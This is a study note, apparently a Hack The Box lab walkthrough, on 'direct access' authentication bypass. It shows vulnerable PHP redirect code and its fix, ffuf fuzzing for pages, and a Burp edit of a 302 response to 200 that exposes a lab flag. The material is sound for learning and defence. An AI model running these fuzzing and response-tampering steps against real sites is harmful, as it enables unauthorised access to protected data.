DIRECT ACCESS

this is the most straightforward way of bypassing authentication checks. this method requests the protected resource directly from an unauthenticated context. attackers then accesses the protected information if the web application does not properly verify that the request is authenticated. 

#original vulnerable php code
#This code redirects the user to /index.php if the session is not active/user is not authenticated - However, the PHP script does not stop execution, resulting in protected information within the page being sent in the response body
if(!$_SESSION['active']) {
  header("Location: index.php");
}


#mitigation
#To prevent the protected information from being returned in the body of the redirect response, the PHP script needs to exit after issuing the redirect
if(!$_SESSION['active']) {
	header("Location: index.php");
	exit;
}
#
root@oco:~$ locate web-extension*
 /usr/share/seclists/Discovery/Web-Content/web-extensions.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/web-extensions.txt .

#identify the extension the site uses
root@oco:~$ ffuf -w web-extensions.txt:FUZZ -u http://94.237.62.184:39910/indexFUZZ
 * .php  [Status: 200, Size: 2971, Words: 638, Lines: 97, Duration: 4328ms]

root@oco:~$ locate *directory-list*
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .

#fuzz for admin pages, etc
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.62.184:39910/FUZZ.php -t 100 -ic
 admin [Status: 302, Size: 14465, Words: 4165, Lines: 429, Duration: 77ms]
 * the output may list different sizes
    - size 0 means no content or empty page
    - size > 0 means the page contains content
    
#verify identified pages
root@oco:~$ curl http://94.237.62.184:39910/admin.php

#intercept requests and test for direct access authentication bypass
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
BURP > Proxy > Requests > right-click > Do intercept > Response to this request > Forward
 Request
  ...
  GET /admin.php HTTP/1.1
  Host: 94.237.62.184:39910
  Cookie: PHPSESSID=e4b4gmh75rbp9k90n2l23rfv39
  Connection: close

BURP > Proxy > Response > Forward
 Response
  ...
  HTTP/1.1 302 Found                      // change this to 200 OK
  Date: Wed, 25 Dec 2024 19:13:30 GMT
  Server: Apache/2.4.59 (Debian)
  Location: index.php
  Connection: close
  
  Modifications...
  HTTP/1.1 200 OK
  
root@oco:~$ BROWSER > http://94.237.62.184:39910/admin.php
 * HTB{913ab2d84b8db21854c696dee1f1db68}
PreviousAUTHENTICATION BYPASSNextPARAMETER MODIFICATION

Last updated